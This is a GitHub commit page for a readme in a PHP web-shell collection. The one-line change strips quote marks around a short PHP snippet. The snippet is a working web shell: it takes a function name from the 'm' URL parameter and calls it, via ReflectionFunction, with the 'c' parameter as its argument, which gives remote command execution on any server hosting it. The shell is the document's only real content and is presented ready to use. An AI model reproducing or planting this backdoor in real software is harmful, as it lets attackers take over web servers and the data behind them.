Skip to content

Commit

Permalink
update readme.md
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc committed Jul 28, 2014
1 parent 8d36b81 commit c77a9da
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions php/p2j/Readme.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,9 +6,9 @@
***************************************************
code:

'<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>'
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>

***************************************************

0 comments on commit c77a9da

Please sign in to comment.